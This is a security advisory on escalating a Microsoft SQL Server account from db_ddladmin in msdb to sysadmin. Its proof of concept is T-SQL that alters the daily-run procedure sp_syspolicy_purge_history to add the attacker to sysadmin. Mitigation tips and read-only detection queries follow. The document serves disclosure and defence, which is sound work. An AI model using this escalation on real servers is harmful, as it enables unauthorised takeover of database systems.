Microsoft SQL Server db_ddladmin Privilege Escalation

2024.01.14
Credit: Emad Al-Mousa
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

Title: SQL Server Privilege Escalation from db_ddladmin to sysadmin
Product: Microsoft SQL Server
Affected Version(s): 2014,2016,2017,2019,2022
Tested Version(s): 2014,2016,2017,2019,2022
Risk Level: Medium
Author of Advisory: Emad Al-Mousa

Overview:
Privilege escalation is a serious attack that attackers use to compromise IT infrastructure and systems. Attackers exploit either vulnerabilities or misconfigurations in the system to escalate their permissions and take over the whole system.

*****************************************
Vulnerability Details:
By design, when you install the SQL Server database engine, a job called “syspolicy_purge_history” is created, and this job runs every day. This job can be weaponized for a privilege escalation attack. The attacker needs to compromise a database account that has been added to the MSDB system database and granted the db_ddladmin role.

*****************************************
Proof of Concept (PoC):
I will create a dummy account called “toto” (for the sake of simulation it will be a SQL-authenticated account):

USE [master]
GO
CREATE LOGIN [toto] WITH PASSWORD=N'toto', DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[us_english], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
GO

Then I will add the account as a database user in the system database MSDB with the db_ddladmin permission:

USE [msdb]
GO
CREATE USER [toto] FOR LOGIN [toto]
GO
USE [msdb]
GO
ALTER ROLE [db_ddladmin] ADD MEMBER [toto]
GO

Then I will execute the following modification code against the procedure:

USE [msdb]
GO
ALTER PROCEDURE [dbo].[sp_syspolicy_purge_history]
AS
BEGIN
ALTER SERVER ROLE [sysadmin] ADD MEMBER [toto]
END

At the next scheduled run of the job syspolicy_purge_history, the account toto will be escalated to the SYSADMIN role, which means he/she will take over the whole SQL Server database system.
-***-
To protect against such attacks, follow these security tips:

Implement in-place auditing for privilege escalation attacks [smart auditing….don’t audit everything as auditing will impose performance overhead].
Implement the least privilege concept in your environment; do not grant any account extra permissions that can be weaponized for a security breach.
A strong identity and account management approach should be in place; password policies are important to make brute-force attacks challenging.
Patch your environments and follow security best practices.

*****************************************
References:
https://databasesecurityninja.wordpress.com/2024/01/07/sql-server-privilege-escalation-from-db_ddladmin-to-sysadmin/
https://learn.microsoft.com/en-us/sql/relational-databases/security/authentication-access/database-level-roles?view=sql-server-ver16
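The auditing and least-privilege tips above can be checked with a few read-only catalog queries against the objects this advisory names. The T-SQL below is an added example, not part of the original advisory; it assumes a login allowed to read msdb and server-level metadata, and the string match on the procedure body is a heuristic rather than a complete detector.

```sql
-- Added example (not from the advisory): read-only review of the
-- db_ddladmin -> sysadmin path through msdb.
USE [msdb];
GO

-- 1. Direct members of db_ddladmin in msdb. Per the advisory, each of these
--    accounts can alter dbo.sp_syspolicy_purge_history.
--    Membership through nested roles is not expanded here.
SELECT m.name AS member_name, m.type_desc, m.create_date
FROM sys.database_role_members AS drm
JOIN sys.database_principals AS r ON r.principal_id = drm.role_principal_id
JOIN sys.database_principals AS m ON m.principal_id = drm.member_principal_id
WHERE r.name = N'db_ddladmin';

-- 2. When was the purge procedure last altered, and does its body contain
--    statements that change server role membership?
--    definition is NULL if the caller lacks permission to view it.
SELECT o.name,
       o.create_date,
       o.modify_date,
       CASE WHEN UPPER(sm.definition) LIKE N'%ALTER SERVER ROLE%'
              OR UPPER(sm.definition) LIKE N'%SP_ADDSRVROLEMEMBER%'
            THEN 1 ELSE 0 END AS changes_server_roles
FROM sys.all_objects AS o
JOIN sys.all_sql_modules AS sm ON sm.object_id = o.object_id
WHERE o.name = N'sp_syspolicy_purge_history'
  AND SCHEMA_NAME(o.schema_id) = N'dbo';

-- 3. Current sysadmin members, to compare against the expected list.
SELECT m.name AS member_name, m.type_desc, m.create_date, m.modify_date
FROM sys.server_role_members AS srm
JOIN sys.server_principals AS r ON r.principal_id = srm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = srm.member_principal_id
WHERE r.name = N'sysadmin';
GO
```

Any row from query 1 that is not an administrative account, or a value of 1 in changes_server_roles, is worth investigating before the job's next daily run.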



Copyright 2024, cxsecurity.com

 
